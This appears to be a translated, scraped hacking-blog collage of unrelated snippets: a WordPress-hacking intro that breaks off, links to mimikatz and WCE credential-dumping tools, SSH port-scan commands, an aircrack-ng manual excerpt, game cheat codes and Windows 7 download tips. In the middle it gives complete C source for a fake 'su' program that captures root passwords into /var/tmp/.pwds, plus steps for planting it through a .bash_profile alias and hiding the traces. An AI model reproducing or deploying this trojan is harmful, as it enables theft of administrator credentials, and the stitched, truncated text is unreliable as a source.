Let's look at how foreigners approach hacking a site
Original: http://resources.infosecinstitute.com/hacking-a-wordpress-site "Targeting and Hacking a WordPress Site"
The answer to that question does not look so definite; obviously there are many ways to hack a site. In this article our goal is to show you how a hacker locks onto and hacks a target site!
Let's take a look at the target site: hack-test.com

First, ping the site to get the IP of the server it lives on:
Download address for the tool:
http://blog.gentilkiwi.com/mimikatz
There is also an article on using this tool to pull the cleartext passwords of active Windows accounts straight out of lsass.exe:
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
I tried it myself on Win2008 R2 x64.
SSHscan.py allows you to scan an internal network through an SSH server with port forwarding enabled. The tool creates a port forward on localhost for every open port detected in the internal network range.
This tool is not one that can be used in every engagement, but when you have the opportunity and the need it will come in handy.
The tool has been included in the edgeSSH kit, where we will include all the scripts related to SSH; at the moment only bruteSSH, an SSH login bruteforcer, and scanSSH are included in the kit.
You can download the code here: http://code.google.com/p/edgessh
Command line options:
-h: target host
-u: username
-p: password
-l: targets list to scan
-t: threads
--remote-host: host to scan
--remote-ports: port list to scan
--default-ports: scan default ports
--all-ports: scan all 65535 ports
--keep-tunnels: forward all open ports
Examples:
scanssh.py -h 192.168.1.55 -u root -p password -t list.txt
scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443
scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports
[source: http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html]
From: http://www.007hack.com/?p=635
Some files under the web directory are not allowed anonymous access (this can be configured in Tomcat, Apache, nginx, etc.), as shown in the figure below:
The following code plus a dictionary can be used to crack it; the result of running it is shown below:
The main code is as follows (the full code is in the attachment; for learning only! Do not use it illegally!):
Click to download: Crack_pass.rar
/*
 * kpr-fakesu.c V0.9beta167
 * by koper
 *
 * Setting up:
 * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c
 * admin@host:~$ mv .su /var/tmp/.su
 * admin@host:~$ cp .bash_profile .wgetrc
 * admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile
 * admin@host:~$ logout
 * *** LOGIN ***
 * admin@host:~$ su
 * Password:
 * su: Authentication failure
 * Sorry.
 * admin@host:~$ su
 * Password:
 * root@host:~# logout
 * admin@host:~$ cat /var/tmp/.pwds
 * root:dupcia17
 * admin@host:~$
 *
 * /bin/su sends various failure information depending on the OS ver.
 * Please modify the source to make it "fit" ;)
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[]){
    FILE *fp;
    char *user;
    char *pass;
    char filex[100];
    char clean[100];
    /* file the captured credentials are written to */
    sprintf(filex,"/var/tmp/.pwds");
    /* cleanup: remove the fake su and restore the original .bash_profile
       (note: the home directory is hardcoded to /home/test here) */
    sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");
    /* mimic su's argument handling: default to root, accept "su user" and "su -l user" */
    if(argc==1) user="root";
    if(argc==2) user=argv[1];
    if(argc>2){
        if(strcmp(argv[1], "-l")==0)
            user=argv[2];
        else user=argv[1];}
    fprintf(stdout,"assword: ");
    pass=getpass ("");
    system("sleep 3");
    /* fake the failure message the real /bin/su would print */
    fprintf(stdout,"su: Authentication failure\nSorry.\n");
    if ((fp=fopen(filex,"w")) != NULL)
    {
        fprintf(fp, "%s:%s\n", user, pass);
        fclose(fp);
    }
    system(clean);
    /* replace the fake binary with a symlink to the real su so the next call succeeds */
    system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");
    return 0;
}
The following three are fairly classic backdoors:
allinone: Linux pentest tools from HUC China
A great app-level backdoor for Linux. Very useful when doing Linux pentests.
Written by Lion [HUC (Hack Union of China)] in 2002
The source code in packetstormsecurity's archive has some errors; now all fixed by akshell (http://www.linuxpentest.com)
Read the full post...
Gears of War under Win7 cannot use trainers or cheat tools, while under XP they work normally.
Solution:
Create a text file, for example cheat.txt, in \My Documents\My Games\Gears of War for Windows\Binaries and write the cheat codes you want into it, like the following:
set WarfareGame.Pawn_COGMarcus DefaultHealth 99999
set warfaregame.Weap_locustpistol MaxSpareAmmo 9999
set warfaregame.Weap_locustpistol Magsize 5000
set warfaregame.Weap_cogpistol MaxSpareAmmo 9999
set warfaregame.Weap_cogpistol Magsize 5000
set warfaregame.Weap_locustassaultrifle MaxSpareAmmo 9999
set warfaregame.Weap_locustassaultrifle MagSize 5000
set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 9999
set WarfareGame.Weap_AssaultRifle MagSize 1000
set WarfareGame.Weap_Grenade MaxSpareAmmo 9999
set WarfareGame.Weap_Grenade MagSize 9000
set WarfareGame.Weap_SniperRifle MaxSpareAmmo 9999
set WarfareGame.Weap_SniperRifle MagSize 5000
set WarfareGameContentWeapons.Weap_Bow MaxSpareAmmo 9999
set WarfareGameContentWeapons.Weap_Bow MagSize 5000
set WarfareGameContentWeapons.Weap_Boomer MaxSpareAmmo 9999
set WarfareGameContentWeapons.Weap_Boomer MagSize 9000
set WarfareGame.Weap_Shotgun MaxSpareAmmo 9999
set WarfareGame.Weap_Shotgun MagSize 9000
**The following method also applies to Windows 7 with SP1
Windows 7 really can be downloaded in 5 minutes, but there is one precondition: a Windows 7 of the same language that is not an Enterprise or VL edition must already exist locally. If you have not downloaded any version of Windows 7 yet, the method below does not apply; it is suggested that you download the Ultimate edition first, which is the fastest.
For example:
If you have any one of Ultimate_x86, starter_x86, professional_x86, home_premium_x86 or homebasic_x86 of Windows 7, you can obtain any one of the remaining 4 versions of Windows 7.
If you have any one of Ultimate_x64, professional_x64 or home_premium_x64 of Windows 7, you can obtain any one of the remaining 2 versions of Windows 7.
(In theory there is also a homebasic_x64, but for some unknown reason Microsoft never released it.)
Here is the method for obtaining it with Xtreme:
Are the versions here originals?
A: MSDN, OEM and retail editions are all originals. I can tell you responsibly that the MSDN versions provided here are all untouched originals. Specifically, the download links or torrents in this post come from three sources:
1. Microsoft's official website.
2. MSDN I Tell You (a well-known reliable source of originals).
3. The Pirate Bay, Jingyou or myself (all resources of this kind have been verified as originals by Jingyou or myself, without exception).
Everyone can download with confidence; the torrents and links here have no problems.
Windows 7 can be downloaded in 5 minutes?
A: Yes, but with one precondition: a Windows 7 of the same language that is not an Enterprise or VOL edition must already exist locally. For the specific method see http://msdn.itellyou.cn/help.htm#express-download (this method was recommended by Jingyou romanyu; special thanks).
Download problems?
1. Version mismatch.
2. The download stops at 99.9%: method 1, press pause and then resume; method 2, close the download software, copy the file to another location and remove the suffix; method 3, keep waiting, it will finish eventually; method 4, Google or Baidu it.
Read the full post...
On October 12 the author of the Pass-The-Hash toolkit published on the mailing list a new version of the Pass-The-Hash attack tool: Windows Credentials Editor, WCE for short.
A single file integrates the functions of listing, adding and changing credentials, so you no longer have to drag several exe and dll files around, and it is only 137KB; an essential tool for internal network penetration testers.
Windows Credentials Editor v1.0 supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually tested yet, but it should work). Windows Credentials Editor (WCE) allows you to list logon sessions and add, change, list and delete associated credentials (e.g. LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks. You can find it here: http://www.ampliasecurity.com/research/wce_v1.0.tgz
//--------------------------------------------------------------------
// AirCrack Chinese manual 1.0
// Translation: GaA.Ra(zhoufan#yahoo.cn)
// Feel free to repost, but please keep this part of the information, thanks
//--------------------------------------------------------------------
/************************************************************
1. AirCrack-ng
Aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.
Aircrack-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aircrack-ng [options] < .cap / .ivs file(s)>
Common options:
-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-p <nbcpu> : # of CPU to use (default: all CPUs)
-q : enable quiet mode (no status output)
-C <macs> : merge the given APs to a virtual one
-l <file> : write key to file
Read the full post...